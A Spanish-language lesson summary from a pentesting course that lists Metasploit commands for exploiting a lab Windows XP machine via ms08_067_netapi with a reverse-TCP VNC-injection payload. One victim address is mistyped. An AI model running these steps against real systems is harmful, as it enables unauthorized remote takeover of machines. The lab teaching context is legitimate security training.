Ataque con Metasploit Framework a Windows XP

Clase 21 de 48Curso de Pentesting 2016

Clase anteriorSiguiente clase

Resumen

Vamos a utilizar una maquina con XP para realizar pruebas para aprender el proceso de explotación de exploits.

  • Ejecutamos msfconsole

  • db_nmap -sV -A -Pn 192.168.57.11 guarda el resultado en la base de datos

  • host vemos los host encontrados con nmap

  • use exploit/windows/smb/ms08_067_netapi

  • Show payload

  • set payload windows/vncinject/reverse_tcp

  • set LHOST 192.168.57.10 nuestro host

  • set RHOST 192.158.57.11 host victima

  • check revisar si es vulnerable

  • exploit explotar la vulnerabilidad